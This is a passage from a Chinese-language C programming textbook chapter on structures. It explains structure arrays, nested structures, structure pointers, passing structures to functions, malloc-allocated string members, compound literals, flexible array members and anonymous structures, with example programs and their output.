注意,数组下标紧跟在library后面,不是成员名后面: library.value[2] // 错误 library[2].value // 正确 1024 使用library[2].value的原因是:library[2]是结构变量名,正如library[1] 是另一个变量名。 顺带一提,下面的表达式代表什么? library[2].title[4] 这是library数组第3个结构变量(library[2]部分)中书名的第5个字符 (title[4]部分)。以程序清单14.2的输出为例,这个字符是e。该例指出,点 运算符右侧的下标作用于各个成员,点运算符左侧的下标作用与结构数组。 最后,总结一下: library        // 一个book 结构的数组 library[2]       // 一个数组元素,该元素是book结构 library[2].title    // 一个char数组(library[2]的title成员) library[2].title[4]  // 数组中library[2]元素的title 成员的一个字符 下面,我们来讨论一下这个程序。 14.4.3 程序讨论 较之程序清单14.1,该程序主要的改动之处是:插入一个while循环读取 多个项。该循环的条件测试是: while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') 表达式 s_gets(library[count].title, MAXTITL)读取一个字符串作为书名, 如果 s_gets()尝试读到文件结尾后面,该表达式则返回NULL。表达式 library[count].title[0] != '\0'判断字符串中的首字符是否是空字符(即,该字符 1025 串是否是空字符串)。如果在一行开始处用户按下 Enter 键,相当于输入了 一个空字符串,循环将结束。程序中还检查了图书的数量,以免超出数组的 大小。 然后,该程序中有如下几行: while (getchar() != '\n') continue; /* 清理输入行 */ 前面章节介绍过,这段代码弥补了scanf()函数遇到空格和换行符就结束 读取的问题。当用户输入书的价格时,可能输入如下信息: 12.50[Enter] 其传送的字符序列如下: 12.50\n scanf()函数接受1、2、.、5和0,但是把\n留在输入序列中。如果没有上 面两行清理输入行的代码,就会把留在输入序列中的换行符当作空行读入, 程序以为用户发送了停止输入的信号。我们插入的这两行代码只会在输入序 列中查找并删除\n,不会处理其他字符。这样s_gets()就可以重新开始下一次 输入。 1026 14.5 嵌套结构 有时,在一个结构中包含另一个结构(即嵌套结构)很方便。例如, Shalala Pirosky创建了一个有关她朋友信息的结构。显然,结构中需要一个 成员表示朋友的姓名。然而,名字可以用一个数组来表示,其中包含名和姓 这两个成员。程序清单14.3是一个简单的示例。 程序清单14.3 friend.c程序 // friend.c -- 嵌套结构示例 #include <stdio.h> #define LEN 20 const char * msgs[5] = { "  Thank you for the wonderful evening, ", "You certainly prove that a ", "is a special kind of guy.We must get together", "over a delicious ", " and have a few laughs" }; struct names {         // 第1个结构 char first[LEN]; char last[LEN]; 1027 }; struct guy {          // 第2个结构 struct names handle;    // 嵌套结构 char favfood[LEN]; char job[LEN]; float income; }; int main(void) { struct guy fellow = {   // 初始化一个结构变量 { "Ewen", "Villard" }, "grilled salmon", "personality coach", 68112.00 }; printf("Dear %s, \n\n", fellow.handle.first); printf("%s%s.\n", msgs[0], fellow.handle.first); printf("%s%s\n", msgs[1], fellow.job); printf("%s\n", msgs[2]); 1028 printf("%s%s%s", msgs[3], fellow.favfood, msgs[4]); if (fellow.income > 150000.0) puts("!!"); else if (fellow.income > 75000.0) puts("!"); else puts("."); printf("\n%40s%s\n", " ", "See you soon,"); printf("%40s%s\n", " ", "Shalala"); return 0; } 下面是该程序的输出: Dear Ewen, Thank you for the wonderful evening, Ewen. You certainly prove that a personality coach is a special kind of guy.We must get together over a delicious grilled salmon and have a few laughs. See you soon, Shalala 1029 首先,注意如何在结构声明中创建嵌套结构。和声明int类型变量一样, 进行简单的声明: struct names handle; 该声明表明handle是一个struct name类型的变量。当然,文件中也应包 含结构names的声明。 其次,注意如何访问嵌套结构的成员,这需要使用两次点运算符: printf("Hello, %s!\n", fellow.handle.first); 从左往右解释fellow.handle.first: (fellow.handle).first 也就是说,找到fellow,然后找到fellow的handle的成员,再找到handle 的first成员。 1030 14.6 指向结构的指针 喜欢使用指针的人一定很高兴能使用指向结构的指针。至少有 4 个理由 可以解释为何要使用指向结构的指针。第一,就像指向数组的指针比数组本 身更容易操控(如,排序问题)一样,指向结构的指针通常比结构本身更容 易操控。第二,在一些早期的C实现中,结构不能作为参数传递给函数,但 是可以传递指向结构的指针。第三,即使能传递一个结构,传递指针通常更 有效率。第四,一些用于表示数据的结构中包含指向其他结构的指针。 下面的程序(程序清单14.4)演示了如何定义指向结构的指针和如何用 这样的指针访问结构的成员。 程序清单14.4 friends.c程序 /* friends.c -- 使用指向结构的指针 */ #include <stdio.h> #define LEN 20 struct names { char first[LEN]; char last[LEN]; }; struct guy { struct names handle; char favfood[LEN]; char job[LEN]; 1031 float income; }; int main(void) { struct guy fellow[2] = { { { "Ewen", "Villard" }, "grilled salmon", "personality coach", 68112.00 }, { { "Rodney", "Swillbelly" }, "tripe", "tabloid editor", 432400.00 } }; struct guy * him;   /* 这是一个指向结构的指针 */ printf("address #1: %p #2: %p\n", &fellow[0], &fellow[1]); him = &fellow[0];   /* 告诉编译器该指针指向何处 */ 1032 printf("pointer #1: %p #2: %p\n", him, him + 1); printf("him->income is $%.2f: (*him).income is $%.2f\n", him->income, (*him).income); him++;        /* 指向下一个结构  */ printf("him->favfood is %s: him->handle.last is %s\n", him->favfood, him->handle.last); return 0; } 该程序的输出如下: address #1: 0x7fff5fbff820 #2: 0x7fff5fbff874 pointer #1: 0x7fff5fbff820 #2: 0x7fff5fbff874 him->income is $68112.00: (*him).income is $68112.00 him->favfood is tripe: him->handle.last is Swillbelly 我们先来看如何创建指向guy类型结构的指针,然后再分析如何通过该 指针指定结构的成员。 14.6.1 声明和初始化结构指针 声明结构指针很简单: struct guy * him; 首先是关键字 struct,其次是结构标记 guy,然后是一个星号(*),其 后跟着指针名。这个语法和其他指针声明一样。 1033 该声明并未创建一个新的结构,但是指针him现在可以指向任意现有的 guy类型的结构。例如,如果barney是一个guy类型的结构,可以这样写: him = &barney; 和数组不同的是,结构名并不是结构的地址,因此要在结构名前面加上 &运算符。 在本例中,fellow 是一个结构数组,这意味着 fellow[0]是一个结构。所 以,要让 him 指向fellow[0],可以这样写: him = &fellow[0]; 输出的前两行说明赋值成功。比较这两行发现,him指向fellow[0],him + 1指向fellow[1]。注意,him加1相当于him指向的地址加84。在十六进制 中,874 - 820 = 54(十六进制)= 84(十进制),因为每个guy结构都占用 84字节的内存:names.first占用20字节,names.last占用20字节,favfood占用 20字节,job占用20字节,income占用4字节(假设系统中float占用4字节)。 顺带一提,在有些系统中,一个结构的大小可能大于它各成员大小之和。这 是因为系统对数据进行校准的过程中产生了一些“缝隙”。例如,有些系统必 须把每个成员都放在偶数地址上,或4的倍数的地址上。在这种系统中,结 构的内部就存在未使用的“缝隙”。 14.6.2 用指针访问成员 指针him指向结构变量fellow[0],如何通过him获得fellow[0]的成员的 值?程序清单14.4中的第3行输出演示了两种方法。 第1种方法也是最常用的方法:使用->运算符。该运算符由一个连接号 (-)后跟一个大于号(>)组成。我们有下面的关系: 如果him == &barney,那么him->income 即是 barney.income 如果him == &fellow[0],那么him->income 即是 fellow[0].income 1034 换句话说,->运算符后面的结构指针和.运算符后面的结构名工作方式 相同(不能写成him.incone,因为him不是结构名)。 这里要着重理解him是一个指针,但是hime->income是该指针所指向结 构的一个成员。所以在该例中,him->income是一个float类型的变量。 第2种方法是,以这样的顺序指定结构成员的值:如果him == &fellow[0],那么*him == fellow[0],因为&和*是一对互逆运算符。因此, 可以做以下替代: fellow[0].income == (*him).income 必须要使用圆括号,因为.运算符比*运算符的优先级高。 总之,如果him是指向guy类型结构barney的指针,下面的关系恒成立: barney.income == (*him).income == him->income // 假设 him == &barney 接下来,我们来学习结构和函数的交互。 1035 14.7 向函数传递结构的信息 函数的参数把值传递给函数。每个值都是一个数字——可能是int类型、 float类型,可能是ASCII字符码,或者是一个地址。然而,一个结构比一个 单独的值复杂,所以难怪以前的C实现不允许把结构作为参数传递给函数。 当前的实现已经移除了这个限制,ANSI C允许把结构作为参数使用。所以 程序员可以选择是传递结构本身,还是传递指向结构的指针。如果你只关心 结构中的某一部分,也可以把结构的成员作为参数。我们接下来将分析这3 种传递方式,首先介绍以结构成员作为参数的情况。 14.7.1 传递结构成员 只要结构成员是一个具有单个值的数据类型(即,int及其相关类型、 char、float、double或指针),便可把它作为参数传递给接受该特定类型的 函数。程序清单14.5中的财务分析程序(初级版本)演示了这一点,该程序 把客户的银行账户添加到他/她的储蓄和贷款账户中。 程序清单14.5 funds1.c程序 /* funds1.c -- 把结构成员作为参数传递 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char   bank[FUNDLEN]; double  bankfund; char   save[FUNDLEN]; double  savefund; 1036 }; double sum(double, double); int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(stan.bankfund, stan.savefund)); return 0; } /* 两个double类型的数相加 */ double sum(double x, double y) { return(x + y); } 1037 运行该程序后输出如下: Stan has a total of $12576.21. 看来,这样传递参数没问题。注意,sum()函数既不知道也不关心实际 的参数是否是结构的成员,它只要求传入的数据是double类型。 当然,如果需要在被调函数中修改主调函数中成员的值,就要传递成员 的地址: modify(&stan.bankfund); 这是一个更改银行账户的函数。 把结构的信息告诉函数的第2种方法是,让被调函数知道自己正在处理 一个结构。 14.7.2 传递结构的地址 我们继续解决前面的问题,但是这次把结构的地址作为参数。由于函数 要处理funds结构,所以必须声明funds结构。如程序清单14.6所示。 程序清单14.6 funds2.c程序 /* funds2.c -- 传递指向结构的指针 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char   bank[FUNDLEN]; double  bankfund; 1038 char   save[FUNDLEN]; double  savefund; }; double sum(const struct funds *); /* 参数是一个指针 */ int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(&stan)); return 0; } double sum(const struct funds * money) { return(money->bankfund + money->savefund); } 1039 运行该程序后输出如下: Stan has a total of $12576.21. sum()函数使用指向funds结构的指针(money)作为它的参数。把地址 &stan传递给该函数,使得指针money指向结构stan。然后通过->运算符获取 stan.bankfund和stan.savefund的值。由于该函数不能改变指针所指向值的内 容,所以把money声明为一个指向const的指针。 虽然该函数并未使用其他成员,但是也可以访问它们。注意,必须使用 &运算符来获取结构的地址。和数组名不同,结构名只是其地址的别名。 14.7.3 传递结构 对于允许把结构作为参数的编译器,可以把程序清单14.6重写为程序清 单14.7。 程序清单14.7 funds3.c程序 /* funds3.c -- 传递一个结构 */ #include <stdio.h> #define FUNDLEN 50 struct funds { char  bank[FUNDLEN]; double bankfund; char  save[FUNDLEN]; double savefund; }; 1040 double sum(struct funds moolah); /* 参数是一个结构 */ int main(void) { struct funds stan = { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 8543.94 }; printf("Stan has a total of $%.2f.\n", sum(stan)); return 0; } double sum(struct funds moolah) { return(moolah.bankfund + moolah.savefund); } 下面是运行该程序后的输出: Stan has a total of $12576.21. 该程序把程序清单14.6中指向struct funds类型的结构指针money替换成 1041 struct funds类型的结构变量moolah。调用sum()时,编译器根据funds模板创建 了一个名为moolah的自动结构变量。然后,该结构的各成员被初始化为 stan 结构变量相应成员的值的副本。因此,程序使用原来结构的副本进行计算, 然而,传递指针的程序清单14.6使用的是原始的结构进行计算。由于moolah 是一个结构,所以该程序使用moolah.bankfund,而不是moolah->bankfund。 另一方面,由于money是指针,不是结构,所以程序清单14.6使用的是monet- >bankfund。 14.7.4 其他结构特性 现在的C允许把一个结构赋值给另一个结构,但是数组不能这样做。也 就是说,如果n_data和o_data都是相同类型的结构,可以这样做: o_data = n_data; // 把一个结构赋值给另一个结构 这条语句把n_data的每个成员的值都赋给o_data的相应成员。即使成员 是数组,也能完成赋值。另外,还可以把一个结构初始化为相同类型的另一 个结构: struct names right_field = {"Ruthie", "George"}; struct names captain = right_field; // 把一个结构初始化为另一个结构 现在的C(包括ANSI C),函数不仅能把结构本身作为参数传递,还能 把结构作为返回值返回。把结构作为函数参数可以把结构的信息传送给函 数;把结构作为返回值的函数能把结构的信息从被调函数传回主调函数。结 构指针也允许这种双向通信,因此可以选择任一种方法来解决编程问题。我 们通过另一组程序示例来演示这两种方法。 为了对比这两种方法,我们先编写一个程序以传递指针的方式处理结 构,然后以传递结构和返回结构的方式重写该程序。 程序清单14.8 names1.c程序 1042 /* names1.c -- 使用指向结构的指针 */ #include <stdio.h> #include <string.h> #define NLEN 30 struct namect { char fname[NLEN]; char lname[NLEN]; int letters; }; void getinfo(struct namect *); void makeinfo(struct namect *); void showinfo(const struct namect *); char * s_gets(char * st, int n); int main(void) { struct namect person; getinfo(&person); makeinfo(&person); showinfo(&person); 1043 return 0; } void getinfo(struct namect * pst) { printf("Please enter your first name.\n"); s_gets(pst->fname, NLEN); printf("Please enter your last name.\n"); s_gets(pst->lname, NLEN); } void makeinfo(struct namect * pst) { pst->letters = strlen(pst->fname) +strlen(pst->lname); } void showinfo(const struct namect * pst) { printf("%s %s, your name contains %d letters.\n", pst->fname, pst->lname, pst->letters); } char * s_gets(char * st, int n) 1044 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余字符 } return ret_val; } 下面是编译并运行该程序后的一个输出示例: Please enter your first name. Viola Please enter your last name. 1045 Plunderfest Viola Plunderfest, your name contains 16 letters. 该程序把任务分配给3个函数来完成,都在main()中调用。每调用一个 函数就把person结构的地址传递给它。 getinfo()函数把结构的信息从自身传递给main()。该函数通过与用户交互 获得姓名,并通过pst指针定位,将其放入 person 结构中。由于 pst->lname 意味着 pst 指向结构的 lname 成员,这使得pst->lname等价于char数组的名 称,因此做s_gets()的参数很合适。注意,虽然getinfo()给main()提供了信 息,但是它并未使用返回机制,所以其返回类型是void。 makeinfo()函数使用双向传输方式传送信息。通过使用指向 person 的指 针,该指针定位了储存在该结构中的名和姓。该函数使用C库函数strlen()分 别计算名和姓中的字母总数,然后使用person的地址储存两数之和。同样, makeinfo()函数的返回类型也是void。 showinfo()函数使用一个指针定位待打印的信息。因为该函数不改变数 组的内容,所以将其声明为const。 所有这些操作中,只有一个结构变量 person,每个函数都使用该结构变 量的地址来访问它。一个函数把信息从自身传回主调函数,一个函数把信息 从主调函数传给自身,一个函数通过双向传输来传递信息。 现在,我们来看如何使用结构参数和返回值来完成相同的任务。第一, 为了传递结构本身,函数的参数必须是person,而不是&person。那么,相 应的形式参数应声明为struct namect,而不是指向该类型的指针。第二,可 以通过返回一个结构,把结构的信息返回给main()。程序清单14.9演示了不 使用指针的版本。 程序清单14.9 names2.c程序 /* names2.c -- 传递并返回结构 */ 1046 #include <stdio.h> #include <string.h> #define NLEN 30 struct namect { char fname[NLEN]; char lname[NLEN]; int letters; }; struct namect getinfo(void); struct namect makeinfo(struct namect); void showinfo(struct namect); char * s_gets(char * st, int n); int main(void) { struct namect person; person = getinfo(); person = makeinfo(person); showinfo(person); return 0; 1047 } struct namect getinfo(void) { struct namect temp; printf("Please enter your first name.\n"); s_gets(temp.fname, NLEN); printf("Please enter your last name.\n"); s_gets(temp.lname, NLEN); return temp; } struct namect makeinfo(struct namect info) { info.letters = strlen(info.fname) + strlen(info.lname); return info; } void showinfo(struct namect info) { printf("%s %s, your name contains %d letters.\n", info.fname, info.lname, info.letters); 1048 } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余部分 } return ret_val; } 该版本最终的输出和前面版本相同,但是它使用了不同的方式。程序中 的每个函数都创建了自己的person备份,所以该程序使用了4个不同的结 构,不像前面的版本只使用一个结构。 1049 例如,考虑makeinfo()函数。在第1个程序中,传递的是person的地址, 该函数实际上处理的是person的值。在第2个版本的程序中,创建了一个新 的结构info。储存在person中的值被拷贝到info中,函数处理的是这个副本。 因此,统计完字母个数后,计算结果储存在info中,而不是person中。然 而,返回机制弥补了这一点。makeinfo()中的这行代码: return info; 与main()中的这行结合: person = makeinfo(person); 把储存在info中的值拷贝到person中。注意,必须把makeinfo()函数声明 为struct namect类型,所以该函数要返回一个结构。 14.7.5 结构和结构指针的选择 假设要编写一个与结构相关的函数,是用结构指针作为参数,还是用结 构作为参数和返回值?两者各有优缺点。 把指针作为参数有两个优点:无论是以前还是现在的C实现都能使用这 种方法,而且执行起来很快,只需要传递一个地址。缺点是无法保护数据。 被调函数中的某些操作可能会意外影响原来结构中的数据。不过,ANSI C 新增的const限定符解决了这个问题。例如,如果在程序清单14.8中, showinfo()函数中的代码改变了结构的任意成员,编译器会捕获这个错误。 把结构作为参数传递的优点是,函数处理的是原始数据的副本,这保护 了原始数据。另外,代码风格也更清楚。假设定义了下面的结构类型: struct vector {double x; double y;}; 如果用vector类型的结构ans储存相同类型结构a和b的和,就要把结构作 为参数和返回值: 1050 struct vector ans, a, b; struct vector sum_vect(struct vector, struct vector); ... ans = sum_vect(a,b); 对程序员而言,上面的版本比用指针传递的版本更自然。指针版本如 下: struct vector ans, a, b; void sum_vect(const struct vector *, const struct vector *, struct vector *); ... sum_vect(&a, &b, &ans); 另外,如果使用指针版本,程序员必须记住总和的地址应该是第1个参 数还是第2个参数的地址。 传递结构的两个缺点是:较老版本的实现可能无法处理这样的代码,而 且传递结构浪费时间和存储空间。尤其是把大型结构传递给函数,而它只使 用结构中的一两个成员时特别浪费。这种情况下传递指针或只传递函数所需 的成员更合理。 通常,程序员为了追求效率会使用结构指针作为函数参数,如需防止原 始数据被意外修改,使用const限定符。按值传递结构是处理小型结构最常 用的方法。 14.7.6 结构中的字符数组和字符指针 到目前为止,我们在结构中都使用字符数组来储存字符串。是否可以使 用指向 char 的指针来代替字符数组?例如,程序清单14.3中有如下声明: 1051 #define LEN 20 struct names { char first[LEN]; char last[LEN]; }; 其中的结构声明是否可以这样写: struct pnames { char * first; char * last; }; 当然可以,但是如果不理解这样做的含义,可能会有麻烦。考虑下面的 代码: struct names veep = {"Talia", "Summers"}; struct pnames treas = {"Brad", "Fallingjaw"}; printf("%s and %s\n", veep.first, treas.first); 以上代码都没问题,也能正常运行,但是思考一下字符串被储存在何 处。对于struct names类型的结构变量veep,以上字符串都储存在结构内部, 结构总共要分配40字节储存姓名。然而,对于struct pnames类型的结构变量 treas,以上字符串储存在编译器储存常量的地方。结构本身只储存了两个地 址,在我们的系统中共占16字节。尤其是,struct pnames结构不用为字符串 分配任何存储空间。它使用的是储存在别处的字符串(如,字符串常量或数 组中的字符串)。简而言之,在pnames结构变量中的指针应该只用来在程序 1052 中管理那些已分配和在别处分配的字符串。 我们看看这种限制在什么情况下出问题。考虑下面的代码: struct names accountant; struct pnames attorney; puts("Enter the last name of your accountant:"); scanf("%s", accountant.last); puts("Enter the last name of your attorney:"); scanf("%s", attorney.last);  /* 这里有一个潜在的危险 */ 就语法而言,这段代码没问题。但是,用户的输入储存到哪里去了?对 于会计师(accountant),他的名储存在accountant结构变量的last成员中,该 结构中有一个储存字符串的数组。对于律师(attorney),scanf()把字符串放 到attorney.last表示的地址上。由于这是未经初始化的变量,地址可以是任何 值,因此程序可以把名放在任何地方。如果走运的话,程序不会出问题,至 少暂时不会出问题,否则这一操作会导致程序崩溃。实际上,如果程序能正 常运行并不是好事,因为这意味着一个未被觉察的危险潜伏在程序中。 因此,如果要用结构储存字符串,用字符数组作为成员比较简单。用指 向 char 的指针也行,但是误用会导致严重的问题。 14.7.7 结构、指针和malloc() 如果使用malloc()分配内存并使用指针储存该地址,那么在结构中使用 指针处理字符串就比较合理。这种方法的优点是,可以请求malloc()为字符 串分配合适的存储空间。可以要求用4字节储存"Joe"和用18字节储 存"Rasolofomasoandro"。用这种方法改写程序清单14.9并不费劲。主要是更 改结构声明(用指针代替数组)和提供一个新版本的getinfo()函数。新的结 1053 构声明如下: struct namect { char * fname; // 用指针代替数组 char * lname; int letters; }; 新版本的getinfo()把用户的输入读入临时数组中,调用malloc()函数分配 存储空间,并把字符串拷贝到新分配的存储空间中。对名和姓都要这样做: void getinfo (struct namect * pst) { char temp[SLEN]; printf("Please enter your first name.\n"); s_gets(temp, SLEN); // 分配内存储存名 pst->fname = (char *) malloc(strlen(temp) + 1); // 把名拷贝到已分配的内存 strcpy(pst->fname, temp); printf("Please enter your last name.\n"); s_gets(temp, SLEN); 1054 pst->lname = (char *) malloc(strlen(temp) + 1); strcpy(pst->lname, temp); } 要理解这两个字符串都未储存在结构中,它们储存在 malloc()分配的内 存块中。然而,结构中储存着这两个字符串的地址,处理字符串的函数通常 都要使用字符串的地址。因此,不用修改程序中的其他函数。 第12章建议,应该成对使用malloc()和free()。因此,还要在程序中添加 一个新的函数cleanup(),用于释放程序动态分配的内存。如程序清单14.10所 示。 程序清单14.10 names3.c程序 // names3.c -- 使用指针和 malloc() #include <stdio.h> #include <string.h>  // 提供 strcpy()、strlen() 的原型 #include <stdlib.h>  // 提供 malloc()、free() 的原型 #define SLEN 81 struct namect { char * fname; // 使用指针 char * lname; int letters; }; 1055 void getinfo(struct namect *);   // 分配内存 void makeinfo(struct namect *); void showinfo(const struct namect *); void cleanup(struct namect *);   // 调用该函数时释放内存 char * s_gets(char * st, int n); int main(void) { struct namect person; getinfo(&person); makeinfo(&person); showinfo(&person); cleanup(&person); return 0; } void getinfo(struct namect * pst) { char temp[SLEN]; printf("Please enter your first name.\n"); s_gets(temp, SLEN); 1056 // 分配内存以储存名 pst->fname = (char *) malloc(strlen(temp) + 1); // 把名拷贝到动态分配的内存中 strcpy(pst->fname, temp); printf("Please enter your last name.\n"); s_gets(temp, SLEN); pst->lname = (char *) malloc(strlen(temp) + 1); strcpy(pst->lname, temp); } void makeinfo(struct namect * pst) { pst->letters = strlen(pst->fname) + strlen(pst->lname); } void showinfo(const struct namect * pst) { printf("%s %s, your name contains %d letters.\n", pst->fname, pst->lname, pst->letters); } 1057 void cleanup(struct namect * pst) { free(pst->fname); free(pst->lname); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余部分 } 1058 return ret_val; } 下面是该程序的输出: Please enter your first name. Floresiensis Please enter your last name. Mann Floresiensis Mann, your name contains 16 letters. 14.7.8 复合字面量和结构(C99) C99 的复合字面量特性可用于结构和数组。如果只需要一个临时结构 值,复合字面量很好用。例如,可以使用复合字面量创建一个数组作为函数 的参数或赋给另一个结构。语法是把类型名放在圆括号中,后面紧跟一个用 花括号括起来的初始化列表。例如,下面是struct book类型的复合字面量: (struct book) {"The Idiot", "Fyodor Dostoyevsky", 6.99} 程序清单14.11中的程序示例,使用复合字面量为一个结构变量提供两 个可替换的值(在撰写本书时,并不是所有的编译器都支持这个特性,不过 这是时间的问题)。 程序清单14.11 complit.c程序 /* complit.c -- 复合字面量 */ #include <stdio.h> #define MAXTITL 41 1059 #define MAXAUTL 31 struct book {     // 结构模版:标记是 book char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book readfirst; int score; printf("Enter test score: "); scanf("%d", &score); if (score >= 84) readfirst = (struct book) {"Crime and Punishment", "Fyodor Dostoyevsky", 11.25}; else readfirst = (struct book) {"Mr.Bouncy's Nice Hat", "Fred Winsome", 1060 5.99}; printf("Your assigned reading:\n"); printf("%s by %s: $%.2f\n", readfirst.title, readfirst.author, readfirst.value); return 0; } 还可以把复合字面量作为函数的参数。如果函数接受一个结构,可以把 复合字面量作为实际参数传递: struct rect {double x; double y;}; double rect_area(struct rect r){return r.x * r.y;} ... double area; area = rect_area( (struct rect) {10.5, 20.0}); 值210被赋给area。 如果函数接受一个地址,可以传递复合字面量的地址: struct rect {double x; double y;}; double rect_areap(struct rect * rp){return rp->x * rp->y;} ... double area; 1061 area = rect_areap( &(struct rect) {10.5, 20.0}); 值210被赋给area。 复合字面量在所有函数的外部,具有静态存储期;如果复合字面量在块 中,则具有自动存储期。复合字面量和普通初始化列表的语法规则相同。这 意味着,可以在复合字面量中使用指定初始化器。 14.7.9 伸缩型数组成员(C99) C99新增了一个特性:伸缩型数组成员(flexible array member),利用 这项特性声明的结构,其最后一个数组成员具有一些特性。第1个特性是, 该数组不会立即存在。第2个特性是,使用这个伸缩型数组成员可以编写合 适的代码,就好像它确实存在并具有所需数目的元素一样。这可能听起来很 奇怪,所以我们来一步步地创建和使用一个带伸缩型数组成员的结构。 首先,声明一个伸缩型数组成员有如下规则: 伸缩型数组成员必须是结构的最后一个成员; 结构中必须至少有一个成员; 伸缩数组的声明类似于普通数组,只是它的方括号中是空的。 下面用一个示例来解释以上几点: struct flex { int count; double average; double scores[]; // 伸缩型数组成员 1062 }; 声明一个struct flex类型的结构变量时,不能用scores做任何事,因为没 有给这个数组预留存储空间。实际上,C99的意图并不是让你声明struct flex 类型的变量,而是希望你声明一个指向struct flex类型的指针,然后用 malloc()来分配足够的空间,以储存struct flex类型结构的常规内容和伸缩型 数组成员所需的额外空间。例如,假设用scores表示一个内含5个double类型 值的数组,可以这样做: struct flex * pf; // 声明一个指针 // 请求为一个结构和一个数组分配存储空间 pf = malloc(sizeof(struct flex) + 5 * sizeof(double)); 现在有足够的存储空间储存count、average和一个内含5个double类型值 的数组。可以用指针pf访问这些成员: pf->count = 5;     // 设置 count 成员 pf->scores[2] = 18.5; // 访问数组成员的一个元素 程序清单14.13进一步扩展了这个例子,让伸缩型数组成员在第1种情况 下表示5个值,在第2种情况下代表9个值。该程序也演示了如何编写一个函 数处理带伸缩型数组元素的结构。 程序清单14.12 flexmemb.c程序 // flexmemb.c -- 伸缩型数组成员(C99新增特性) #include <stdio.h> #include <stdlib.h> struct flex 1063 { size_t count; double average; double scores []; // 伸缩型数组成员 }; void showFlex(const struct flex * p); int main(void) { struct flex * pf1, *pf2; int n = 5; int i; int tot = 0; // 为结构和数组分配存储空间 pf1 = malloc(sizeof(struct flex) + n * sizeof(double)); pf1->count = n; for (i = 0; i < n; i++) { pf1->scores[i] = 20.0 - i; tot += pf1->scores[i]; 1064 } pf1->average = tot / n; showFlex(pf1); n = 9; tot = 0; pf2 = malloc(sizeof(struct flex) + n * sizeof(double)); pf2->count = n; for (i = 0; i < n; i++) { pf2->scores[i] = 20.0 - i / 2.0; tot += pf2->scores[i]; } pf2->average = tot / n; showFlex(pf2); free(pf1); free(pf2); return 0; } void showFlex(const struct flex * p) 1065 { int i; printf("Scores : "); for (i = 0; i < p->count; i++) printf("%g ", p->scores[i]); printf("\nAverage: %g\n", p->average); } 下面是该程序的输出: Scores : 20 19 18 17 16 Average: 18 Scores : 20 19.5 19 18.5 18 17.5 17 16.5 16 Average: 17 带伸缩型数组成员的结构确实有一些特殊的处理要求。第一,不能用结 构进行赋值或拷贝: struct flex * pf1, *pf2;  // *pf1 和*pf2 都是结构 ... *pf2 = *pf1;       // 不要这样做 这样做只能拷贝除伸缩型数组成员以外的其他成员。确实要进行拷贝, 应使用memcpy()函数(第16章中介绍)。 第二,不要以按值方式把这种结构传递给结构。原因相同,按值传递一 1066 个参数与赋值类似。要把结构的地址传递给函数。 第三,不要使用带伸缩型数组成员的结构作为数组成员或另一个结构的 成员。 这种类似于在结构中最后一个成员是伸缩型数组的情况,称为struct hack。除了伸缩型数组成员在声明时用空的方括号外,struct hack特指大小为 0的数组。然而,struct hack是针对特殊编译器(GCC)的,不属于C标准。 这种伸缩型数组成员方法是标准认可的编程技巧。 14.7.10 匿名结构(C11) 匿名结构是一个没有名称的结构成员。为了理解它的工作原理,我们先 考虑如何创建嵌套结构: struct names { char first[20]; char last[20]; }; struct person { int id; struct names name;// 嵌套结构成员 }; struct person ted = {8483, {"Ted", "Grass"}}; 1067 这里,name成员是一个嵌套结构,可以通过类似ted.name.first的表达式 访问"ted": puts(ted.name.first); 在C11中,可以用嵌套的匿名成员结构定义person: struct person { int id; struct {char first[20]; char last[20];}; // 匿名结构 }; 初始化ted的方式相同: struct person ted = {8483, {"Ted", "Grass"}}; 但是,在访问ted时简化了步骤,只需把first看作是person的成员那样使 用它: puts(ted.first); 当然,也可以把first和last直接作为person的成员,删除嵌套循环。匿名 特性在嵌套联合中更加有用,我们在本章后面介绍。 14.7.11 使用结构数组的函数 假设一个函数要处理一个结构数组。由于数组名就是该数组的地址,所 以可以把它传递给函数。另外,该函数还需访问结构模板。为了理解该函数 的工作原理,程序清单14.13把前面的金融程序扩展为两人,所以需要一个 内含两个funds结构的数组。 1068 程序清单14.13 funds4.c程序 /* funds4.c -- 把结构数组传递给函数 */ #include <stdio.h> #define FUNDLEN 50 #define N 2 struct funds { char   bank[FUNDLEN]; double  bankfund; char save[FUNDLEN]; double  savefund; }; double sum(const struct funds money [], int n); int main(void) { struct funds jones[N] = { { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 1069 8543.94 }, { "Honest Jack's Bank", 3620.88, "Party Time Savings", 3802.91 } }; printf("The Joneses have a total of $%.2f.\n",sum(jones, N)); return 0; } double sum(const struct funds money [], int n) { double total; int i; for (i = 0, total = 0; i < n; i++) total += money[i].bankfund + money[i].savefund; return(total); 1070 } 该程序的输出如下: The Joneses have a total of $20000.00. (读者也许认为这个总和有些巧合!) 数组名jones是该数组的地址,即该数组首元素(jones[0])的地址。因 此,指针money的初始值相当于通过下面的表达式获得: money = &jones[0]; 因为money指向jones数组的首元素,所以money[0]是该数组的另一个名 称。与此类似,money[1]是第2个元素。每个元素都是一个funds类型的结 构,所以都可以使用点运算符(.)来访问funds类型结构的成员。 下面是几个要点。 可以把数组名作为数组中第1个结构的地址传递给函数。 然后可以用数组表示法访问数组中的其他结构。注意下面的函数调用与 使用数组名效果相同: sum(&jones[0], N) 